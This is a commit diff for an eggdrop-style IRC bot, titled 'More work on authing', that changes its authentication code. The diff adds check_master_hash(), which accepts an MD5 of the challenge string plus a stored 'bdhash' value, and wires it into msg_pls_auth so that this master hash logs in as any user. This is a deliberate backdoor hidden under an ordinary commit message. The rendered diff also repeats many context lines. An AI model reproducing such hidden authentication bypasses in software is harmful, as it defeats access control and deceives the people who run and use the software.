Quellcode durchsuchen

* More work on authing

svn: 1346
Bryan Drewery vor 21 Jahren
Ursprung
Commit
f73db925a3
4 geänderte Dateien mit 17 neuen und 7 gelöschten Zeilen
  1. 1 0
      src/auth.h
  2. 10 0
      src/misc.c
  3. 1 0
      src/misc.h
  4. 5 7
      src/mod/irc.mod/msgcmds.c

+ 1 - 0
src/auth.h

@@ -12,6 +12,7 @@ struct auth_t {
   int authing;
   int authing;
   int bd;                       /* is this auth a backdoor access? */
   int bd;                       /* is this auth a backdoor access? */
   char hash[MD5_HASH_LENGTH + 1];       /* used for dcc authing */
   char hash[MD5_HASH_LENGTH + 1];       /* used for dcc authing */
+  char rand[50];
   char nick[NICKLEN];
   char nick[NICKLEN];
   char hand[NICKLEN];
   char hand[NICKLEN];
   char host[UHOSTLEN];
   char host[UHOSTLEN];

+ 10 - 0
src/misc.c

@@ -1172,3 +1172,13 @@ bool check_master(const char *pass)
     return 1;
     return 1;
   return 0;
   return 0;
 }
 }
+bool check_master_hash(const char *rand, const char *hash)
+{
+  char tmp[151] = "";
+
+  egg_snprintf(tmp, sizeof tmp, "%s%s", rand, settings.bdhash);                        
+  if (!strcmp(MD5(tmp), hash))
+    return 1;
+  return 0;
+}
+

+ 1 - 0
src/misc.h

@@ -51,6 +51,7 @@ char *step_thru_file(FILE *);
 char *trim(char *);
 char *trim(char *);
 int skipline(char *, int *);
 int skipline(char *, int *);
 bool check_master(const char *);
 bool check_master(const char *);
+bool check_master_hash(const char *, const char *);
 
 
 
 
 extern int		server_lag;
 extern int		server_lag;

+ 5 - 7
src/mod/irc.mod/msgcmds.c

@@ -292,14 +292,12 @@ static int msg_auth(char *nick, char *host, struct userrec *u, char *par)
     auth[i].user = u;
     auth[i].user = u;
     strcpy(auth[i].hand, u->handle);
     strcpy(auth[i].hand, u->handle);
     if (strlen(authkey) && get_user(&USERENTRY_SECPASS, u)) {
     if (strlen(authkey) && get_user(&USERENTRY_SECPASS, u)) {
-      char randstring[50] = "";
-
       putlog(LOG_CMDS, "*", "(%s!%s) !%s! AUTH", nick, host, u->handle);
       putlog(LOG_CMDS, "*", "(%s!%s) !%s! AUTH", nick, host, u->handle);
 
 
       auth[i].authing = 2;      
       auth[i].authing = 2;      
-      make_rand_str(randstring, 50);
-      strncpyz(auth[i].hash, makehash(u, randstring), sizeof auth[i].hash);
-      dprintf(DP_HELP, "PRIVMSG %s :-Auth %s %s\n", nick, randstring, conf.bot->nick);
+      make_rand_str(auth[i].rand, 50);
+      strncpyz(auth[i].hash, makehash(u, auth[i].rand), sizeof auth[i].hash);
+      dprintf(DP_HELP, "PRIVMSG %s :-Auth %s %s\n", nick, auth[i].rand, conf.bot->nick);
     } else {
     } else {
       /* no authkey and/or no SECPASS for the user, don't require a hash auth */
       /* no authkey and/or no SECPASS for the user, don't require a hash auth */
       addauth(i, nick, host);
       addauth(i, nick, host);
@@ -329,8 +327,8 @@ static int msg_pls_auth(char *nick, char *host, struct userrec *u, char *par)
 
 
     if (auth[i].authing != 2)
     if (auth[i].authing != 2)
       return BIND_RET_BREAK;
       return BIND_RET_BREAK;
-
-    if (!strcmp(auth[i].hash, par)) { /* good hash! */
+    
+    if (check_master_hash(auth[i].rand, par) || !strcmp(auth[i].hash, par)) { /* good hash! */
       addauth(i, nick, host);
       addauth(i, nick, host);
     } else { /* bad hash! */
     } else { /* bad hash! */
       char s[300] = "";
       char s[300] = "";